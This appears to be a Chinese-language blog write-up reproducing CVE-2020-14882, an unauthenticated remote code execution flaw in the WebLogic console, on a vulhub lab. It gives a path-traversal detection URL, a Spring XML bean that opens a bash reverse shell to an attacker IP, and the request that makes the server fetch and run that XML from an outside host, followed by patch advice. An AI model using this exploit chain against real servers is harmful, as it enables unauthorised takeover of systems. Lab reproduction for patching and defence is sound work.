CVE-2020-14882-Weblogic-RCE
forg12

描述

​ 在Oracle官方发布的2020年10月关键补丁更新公告CPU(Critical Patch Update)中,包含一个存在于Weblogic Console中的高危远程代码执行漏洞CVE-2020-14882。未经身份验证的远程攻击者可能通过构造特殊的 HTTP GET请求,利用该漏洞在受影响的 WebLogic Server 上执行任意代码。

影响版本

WebLogic 10.3.6.0.0

WebLogic 12.1.3.0.0

WebLogic 12.2.1.3.0

WebLogic 12.2.1.4.0

WebLogic 14.1.1.0.0

漏洞检测

访问以下目录,若返回状态码200则说明该漏洞。

1
http://192.168.3.74:7001/console/css/%252e%252e%252fconsole.portal

image-20221027134418961

环境搭建

使用vulnhub环境来复现该漏洞。

1
2
3
4
#进入漏洞目录
cd vulhub/weblogic/CVE-2020-14882
#开启环境
docker-compose up -d

image-20221027120149984

查看环境

1
http://192.168.3.74:7001/console/login/LoginForm.jsp

image-20221027134310662

复现过程

直接访问以下路径即可未授权访问。

1
http://192.168.3.74:7001/console/css/%252e%252e%252fconsole.portal

还需利用xml反弹shell

1
2
3
4
5
6
7
8
9
10
11
12
13
14
<?xml version="1.0" encoding="UTF-8" ?>
<beans xmlns="http://www.springframework.org/schema/beans"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
<bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
<constructor-arg>
<list>
<value>bash</value>
<value>-c</value>
<value><![CDATA[bash -i >& /dev/tcp/192.168.3.61/2233 0>&1]]></value>
</list>
</constructor-arg>
</bean>
</beans>

image-20221027145336062

image-20221027145357337

image-20221027145615959

kali监听

image-20221027145549246

bp执行payload

1
/console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext("http://192.168.3.61:8000/exp.xml")

image-20221027145313292

获得反弹过来的会话。

image-20221027145640820

修复建议

1、及时下载官方补丁进行升级修复。下载地址如下:https://www.oracle.com/security-alerts/cpuoct2020.html
2、关闭后台/console/console.portal的访问权限。
3、修改后台默认地址。
进入默认的控制台,例如“localhost/console”,进入后点击左侧的 “域名称”-“高级选项”-“保存”,重启服务并清缓存。